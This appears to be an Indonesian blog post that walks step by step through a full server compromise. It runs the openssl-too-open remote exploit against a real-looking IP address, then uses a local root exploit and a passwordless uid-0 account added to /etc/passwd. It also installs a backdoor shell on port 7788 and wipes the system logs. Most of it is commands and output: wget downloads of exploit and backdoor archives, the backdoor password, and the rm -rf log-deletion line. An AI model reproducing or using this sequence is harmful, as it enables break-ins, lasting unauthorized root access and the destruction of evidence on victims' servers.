OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell
*hint* : try play with -b
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
Tidak ada komentar:
Posting Komentar